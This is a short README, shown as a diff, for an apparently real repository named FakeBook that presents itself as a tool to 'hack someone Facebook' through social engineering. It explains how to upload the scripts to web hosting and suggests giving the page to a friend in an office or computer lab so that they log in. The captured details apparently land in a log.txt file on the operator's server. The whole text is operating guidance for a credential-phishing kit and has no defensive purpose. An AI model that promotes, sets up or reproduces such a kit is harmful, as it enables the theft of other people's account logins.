aghanathan/FakeBook/README.md

 # FakeBook - JavaScript inject0r
 Hack Someone Facebook With JavaScript inject0r (Social Engineering)

+Give to a friend near you in the Office or Computer labs to Login into His or her FaceBook ツ

 Upload All the scripts from <strong>https://github.com/aghanathan/FakeBook</strong> into your Web Hosting (e.g. <b>'/public_html/FakeBook'</b>)
 It Will Create a text file ('log.txt') (e.g. <b>http://gofreelancer.xyz/FakeBook/log.txt</b>)